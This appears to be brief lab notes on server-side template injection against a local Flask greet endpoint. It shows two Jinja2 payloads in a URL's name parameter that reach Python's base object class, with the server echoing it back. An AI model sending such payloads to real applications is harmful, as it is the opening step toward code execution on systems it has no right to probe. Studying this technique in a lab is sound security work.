{{''.__class__.__mro__[1]}}
# command: http://127.0.0.1:5000/greet?name={{().__class__.__mro__[1]}}
#  return:
# 
# Hello <class 'object'>

{{[].__class__.__bases__[0]}}
# command: http://127.0.0.1:5000/greet?name={{[].__class__.__bases__[0]}}
#  return:
#
# Hello <class 'object'>